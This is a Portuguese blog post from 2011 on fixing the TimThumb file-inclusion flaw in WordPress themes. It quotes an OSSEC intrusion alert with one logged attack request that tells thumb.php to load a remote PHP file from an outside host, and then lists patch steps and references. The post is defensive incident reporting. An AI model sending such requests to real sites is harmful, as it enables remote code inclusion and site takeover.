Ir para o conteúdo
ou

Software livre Brasil

 Voltar a Alexos Core ...
Tela cheia

WordPress: Corrigindo vulnerabilidade no timthumb

11 de Novembro de 2011, 0:00 , por Software Livre Brasil - 0sem comentários ainda | Ninguém está seguindo este artigo ainda.
Visualizado 811 vezes
<p><a href="http://blog.alexos.com.br/wp-content/uploads/2011/03/internetera-net-wordpress-eye-wallpaper.jpg"><img class="alignright size-medium wp-image-2310" title="internetera-net-wordpress-eye-wallpaper" src="http://blog.alexos.com.br/wp-content/uploads/2011/03/internetera-net-wordpress-eye-wallpaper-300x225.jpg" height="225" alt="" width="300" /></a>Sugiu uma vulnerabilidade no WordPress classificada como alta, a falha foi encontrada no script timthumb presente na maioria dos templates e permite a inclusão de arquivos maliciosos.</p> <p>O Ossec alerta e bloqueia as tentativas de ataque com o objetivo de explorar está vulnerabilidade se a active-response foi habilitada.</p> <blockquote><p> OSSEC HIDS Notification.<br /> 2011 Nov 11 03:29:38</p> <p>Received From: acme->/var/log/httpd/www.acme.com-access_log<br /> Rule: 31151 fired (level 10) -> &#8220;Mutiple web server 400 error codes from same source ip.&#8221;<br /> Portion of the log(s):</p> <p>xx.xxx.xxx.xxx &#8211; - [11/Nov/2011:04:29:25 -0200] &#8220;GET //wp-content/themes/Quadro/thumb.php?src=http://picasa.com.xpl.be/yahoo.php HTTP/1.1&#8243; 404 232 &#8220;-&#8221; &#8220;Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4&#8243; </p></blockquote> <p>Para corrigi-la é necessário executar os seguintes passos:</p> <p>1 . Localizar se o arquivo timthumb.php, thumb.php ou similar que encontra-se no diretório template localizado em <em><strong>/wp-content/themes</strong></em>;</p> <p>2. Em caso afirmativo substituir todo o código pela nova versão[1]<br />  <br /> [1] code.google.com/p/timthumb/source/browse/trunk/timthumb.php</p> <p><strong>Maiores informações:</strong></p> <p>blog.ptservidor.pt/seguranca/alerta-de-seguranca-vulnerabilidade-timthumb/<br /> blog.spiderlabs.com/2011/11/wordpress-timthumb-attacks-rising.html<br /> markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/</p> <div><h3>See:</h3><ul><li><a href="http://blog.alexos.com.br/?p=2302&amp;#38;lang=pt-br" class="crp_title">Usando o http-wp-plugins do Nmap para detectar plugins do WordPress</a></li><li><a href="http://blog.alexos.com.br/?p=2180&amp;#38;lang=pt-br" class="crp_title">Nessus Viewer</a></li><li><a href="http://blog.alexos.com.br/?p=2770&amp;#38;lang=pt-br" class="crp_title">Conheça o projeto Muffin</a></li><li><a href="http://blog.alexos.com.br/?p=2650&amp;#38;lang=pt-br" class="crp_title">Ossec HIDS &#8211; Bloqueando o ZmEu bot e outros Web scanners</a></li><li><a href="http://blog.alexos.com.br/?p=2555&amp;#38;lang=pt-br" class="crp_title">Eventos Segurança da Informação &#8211; 2o. semestre 2011</a></li></ul></div>
Fonte: http://blog.alexos.com.br/?p=2795&lang=pt-br

0sem comentários ainda

Enviar um comentário

Os campos são obrigatórios.

Se você é um usuário registrado, pode se identificar e ser reconhecido automaticamente.

 Cancelar